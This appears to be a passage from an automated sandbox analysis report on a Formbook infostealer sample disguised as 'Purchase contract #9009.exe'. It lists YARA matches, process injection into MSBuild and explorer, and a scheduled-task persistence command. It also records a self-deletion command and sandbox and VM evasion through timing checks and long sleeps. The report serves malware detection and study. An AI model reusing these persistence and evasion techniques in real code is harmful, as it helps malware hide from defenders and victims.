Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B14120		9_2_04B14120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFF900		9_2_04AFF900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC22AE		9_2_04BC22AE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB4AEF		9_2_04BB4AEF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BAFA2B		9_2_04BAFA2B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2EBB0		9_2_04B2EBB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BA23E3		9_2_04BA23E3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB03DA		9_2_04BB03DA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBDBD2		9_2_04BBDBD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2ABD8		9_2_04B2ABD8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC2B28		9_2_04BC2B28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A309		9_2_04B1A309
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AB40		9_2_04B1AB40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EA2FB0		9_2_02EA2FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EA8C60		9_2_02EA8C60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EA8C64		9_2_02EA8C64
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EA2D88		9_2_02EA2D88
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EA2D90		9_2_02EA2D90

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 04AFB150 appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 015AB150 appears 48 times

PE file contains strange resources

Source: Purchase contract #9009.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nzRFOjxWpomfsw.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: Purchase contract #9009.exe, 00000001.00000000.635312674.0000000000214000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.674138068.00000000055C0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677412365.000000000DC60000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.671070380.0000000003D1A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStoreElement.dllB vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase contract #9009.exe
Source: Purchase contract #9009.exe	Binary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe

Uses 32bit PE files

Source: Purchase contract #9009.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Binary contains paths to development resources

Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: *.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@11/8

Creates files inside the user directory

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Mutant created: \Sessions\1\BaseNamedObjects\lSWDNesHjauOn

Creates temporary files

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp

Jump to behavior

Launches a second explorer.exe instance

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\explorer.exe

PE file has an executable .text section and no other executable section

Source: Purchase contract #9009.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Reads ini files

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Purchase contract #9009.exe	Virustotal: Detection: 25%
Source: Purchase contract #9009.exe	ReversingLabs: Detection: 36%

Sample reads its own file content

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File read: C:\Users\user\Desktop\Purchase contract #9009.exe

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Purchase contract #9009.exe 'C:\Users\user\Desktop\Purchase contract #9009.exe'
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: Purchase contract #9009.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

PE file has a big code size

Source: Purchase contract #9009.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Submission file is bigger than most known malware samples

Source: Purchase contract #9009.exe

Static file information: File size 1374720 > 1048576

PE file has a big raw section

Source: Purchase contract #9009.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x110400

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Purchase contract #9009.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
Source:	Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010C836 push es; retf		1_2_0010C973
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010C9C6 push es; ret		1_2_0010CB53
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B673 push es; iretd		1_2_0010C833
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B673 push es; retf		1_2_0010C973
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B673 push es; retf 0001h		1_2_0010C9C3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010C976 push es; retf 0001h		1_2_0010C9C3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010C976 push es; ret		1_2_0010CB53
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010C976 push es; retn 0001h		1_2_0010CBA3
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Code function: 1_2_0010B6C0 push es; iretd		1_2_0010C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004150FC push ss; iretd		4_2_00415117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B3B5 push eax; ret		4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B46C push eax; ret		4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B402 push eax; ret		4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B40B push eax; ret		4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041C57F push dword ptr [7A69614Dh]; ret		4_2_0041C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B6CC push 24CBA43Eh; ret		4_2_0041B6FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015FD0D1 push ecx; ret		4_2_015FD0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B4D0D1 push ecx; ret		9_2_04B4D0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBBA3A push es; iretd		9_2_02EBBA3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB3B5 push eax; ret		9_2_02EBB408
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EB50FC push ss; iretd		9_2_02EB5117
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB9C3 push eax; retf		9_2_02EBB9C4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBBEFB pushad ; iretd		9_2_02EBBEFF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB6CC push 24CBA43Eh; ret		9_2_02EBB6FD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB46C push eax; ret		9_2_02EBB472
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB40B push eax; ret		9_2_02EBB472
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBB402 push eax; ret		9_2_02EBB408
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_02EBC57F push dword ptr [7A69614Dh]; ret		9_2_02EBC5A0

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 6.97011388032
Source: initial sample	Static PE information: section name: .text entropy: 6.97011388032

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

File created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase contract #9009.exe PID: 6948, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000002EA85E4 second address: 0000000002EA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000002EA897E second address: 0000000002EA8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 6952	Thread sleep time: -41114s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 4696	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 4044	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7056	Thread sleep time: -36000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Thread delayed: delay time: 41114			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

